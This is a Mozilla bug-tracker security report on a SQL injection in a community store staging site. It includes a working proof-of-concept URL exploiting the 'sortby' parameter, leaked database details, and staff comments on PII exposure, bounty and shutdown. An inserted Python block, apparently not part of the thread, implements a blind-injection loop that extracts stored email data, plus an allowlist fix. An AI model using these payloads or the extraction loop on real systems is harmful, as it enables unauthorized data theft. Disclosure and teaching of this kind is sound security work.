Bug 650105: community-store.authstage.mozilla.com SQL Injection
Opened 13 years ago; closed 13 years ago
Categories: Websites :: communitystore.mozilla.org, defect
Tracking: (Not tracked)
Status: VERIFIED WONTFIX
Reporter: luca.defulgentis; Assignee: Unassigned
Whiteboard: [infrasec:sqlinject][ws:critical]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Build Identifier:

Hello Mozilla,

I found a SQL injection in the "community-store.authstage.mozilla.com" web application. I was able to exploit the injection via the "sortby" parameter and read MySQL variable values.

The following is a proof-of-concept exploit that I used in order to infer the length of the database() variable value. If the system variable is 21 bytes long, then the "(select 1 union select 2)" statement is executed, triggering an application error. Otherwise no error message is displayed.

https://community-store.authstage.mozilla.com/admin/review?order=asc&sortby=+if(length(database())=21,(select+1+union+select+2),type)

I'm also reporting some variables' values inferred thanks to the described method:

user() => commstore@10.2.81.29
version() => 5.0.77-log
database() => community_store_stage

Thank you,
Luca De Fulgentis

Reproducible: Always
Updated•13 years ago
Whiteboard: [infrasec:sqlinject]
Comment 1•13 years ago
Thanks for the report Luca. We're working to resolve the issue. Vulnerable code in upload.class.php L135 http://viewvc.svn.mozilla.org/vc/projects/community_store/trunk/models/upload.class.php?revision=29816&view=markup
Status: UNCONFIRMED → NEW
Component: www.mozillaonline.com → communitystore.mozilla.org
Ever confirmed: true
OS: Linux → All
QA Contact: www-mozillaonline-com → communitystore-mozilla-org
Hardware: x86 → All
Whiteboard: [infrasec:sqlinject] → [infrasec:sqlinject][ws:critical]
Comment 3•13 years ago
The admin page is turned off. This issue has been resolved. Please open a new bug to verify the security patch changes if the admin page is re-enabled.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Comment 4•13 years ago
A review of the supplied SQL file for the site shows that the following information stored in the tables would be available to an attacker:

email, firstname, lastname, ip_address

I've left out the other fields/bits that don't have a privacy impact in my opinion. Even if a user selects the "anonymous" option, the data supplied for email/firstname/lastname is inserted into the DB.

The injection is in a SELECT statement query(), which prevents multiple queries (INSERT, DELETE, UPDATE, etc.) by design. However, an attacker can still use subqueries and call MySQL functions as demonstrated above.
Comment 5•13 years ago
community-store isn't on our bounty list, but this is exposing PII and (along with other bugs) prompted us to shut down the site so we're going to award this one $1000
Comment 6•13 years ago
All: bug 627082 is the tracking bug for all of the related community store security bugs. I emailed Silver Orange to find out if they have availability to do the code fixes. Most of the fixes will require changing from dynamic SQL statements to parametrized statements in the PHP code. If Silver Orange is not available, I will talk to Fred about the availability of any Flux developers. Thanks, cmore
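The three technical points in this thread (the reporter's boolean-blind inference through the `sortby` parameter, comment 4's observation that a SELECT-only `query()` still lets an attacker read stored PII through subqueries, and comment 6's remedy of replacing dynamic SQL) fit in one worked example. The code below is an added illustration, not the community store's PHP or any code from this bug; the `review` table, its columns and the sample rows are constructed stand-ins because the real schema is not on the page. It runs against an in-memory SQLite database, which has no MySQL `if()`/`database()` and does not raise on a two-row scalar subquery, so the oracle here is the row order returned by the injected `CASE` expression rather than the error the PoC relies on; the inference loop is otherwise the same. The hardened builder shows the caveat a practitioner needs to pair with "parametrized statements": an ORDER BY column or direction cannot be bound as a placeholder, so it has to be mapped through an allowlist.

```python
import sqlite3
import string

# Constructed sample rows standing in for the store's review data. The real
# schema is not on the page, so the table and column names are assumptions.
SAMPLE_ROWS = [
    (1, "bug", "alice@example.org"),
    (2, "feature", "bob@example.org"),
    (3, "idea", "carol@example.org"),
]

# Allowlist for the hardened builder: request value -> real column / keyword.
ALLOWED_SORT = {"id": "id", "type": "type", "email": "email"}
ALLOWED_ORDER = {"asc": "ASC", "desc": "DESC"}

CHARSET = string.ascii_lowercase + string.digits + "@."


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE review (id INTEGER, type TEXT, email TEXT)")
    conn.executemany("INSERT INTO review VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable(sortby, order):
    """The bug class: request parameters concatenated straight into ORDER BY."""
    return f"SELECT id, type FROM review ORDER BY {sortby} {order}"


def build_safe(sortby, order):
    """ORDER BY identifiers cannot be bound as placeholders, so map the
    request values through an allowlist and reject anything else."""
    try:
        column, direction = ALLOWED_SORT[sortby], ALLOWED_ORDER[order]
    except KeyError:
        raise ValueError(f"unsupported sort parameter: {sortby!r} {order!r}") from None
    return f"SELECT id, type FROM review ORDER BY {column} {direction}"


def oracle(conn, condition):
    """Boolean-blind oracle through the vulnerable builder. The PoC on this
    bug forces a MySQL error when its condition holds; SQLite does not raise
    for a two-row scalar subquery, so this version flips the sort order
    instead: ascending ids mean the condition was true."""
    payload = f"CASE WHEN ({condition}) THEN id ELSE -id END"
    ids = [row[0] for row in conn.execute(build_vulnerable(payload, "asc"))]
    return ids == sorted(ids)


def infer_length(conn, expr, max_len=64):
    """Same loop as the reporter's length(database())=21 probe."""
    for n in range(max_len + 1):
        if oracle(conn, f"length({expr}) = {n}"):
            return n
    return None


def infer_string(conn, expr, charset=CHARSET, max_len=64):
    """Recover a value one character at a time, the way user(), version()
    and database() were recovered in the report."""
    length = infer_length(conn, expr, max_len)
    if length is None:
        return None
    chars = []
    for pos in range(1, length + 1):
        for c in charset:
            if oracle(conn, f"substr({expr}, {pos}, 1) = '{c}'"):
                chars.append(c)
                break
        else:
            chars.append("?")  # character outside the probed charset
    return "".join(chars)


def demo():
    conn = setup()
    version_len = infer_length(conn, "sqlite_version()")
    # Comment 4's point: a SELECT-only query() does not stop subqueries, so
    # stored PII is readable through the same oracle.
    email = infer_string(conn, "(SELECT email FROM review WHERE id = 1)")
    try:
        build_safe("CASE WHEN 1 THEN id ELSE -id END", "asc")
        rejected = False
    except ValueError:
        rejected = True
    return {
        "version_len_matches": version_len == len(sqlite3.sqlite_version),
        "email": email,
        "safe_sql": build_safe("type", "asc"),
        "payload_rejected": rejected,
    }


if __name__ == "__main__":
    print(demo())
```

Each `oracle()` call is one request in the real attack, so recovering a 17-character email costs a few hundred queries; that is the cost profile behind comment 5's assessment that the bug exposes PII even though the injection sits in a read-only statement.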
Comment 7•13 years ago
The communitystore was only temporarily shut down. We are in the process of evaluating the pros and cons of fixing the security issues. This bug should stay open until that decision has been made. The website is only redirected and has not been officially EOL'd. Thanks, Chris
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Comment 8•13 years ago
As per bug# 657516 , communitystore has been taken down. Changing this issue to RESOLVED
Status: REOPENED → RESOLVED
Closed: 13 years ago → 13 years ago
Resolution: --- → FIXED
Comment 9•13 years ago
Please validate that this code has a note about this vulnerability in case somebody wants to use it for another purpose.
Group: websites-security
Status: RESOLVED → VERIFIED
Resolution: FIXED → WONTFIX
Updated•11 years ago
Flags: sec-bounty+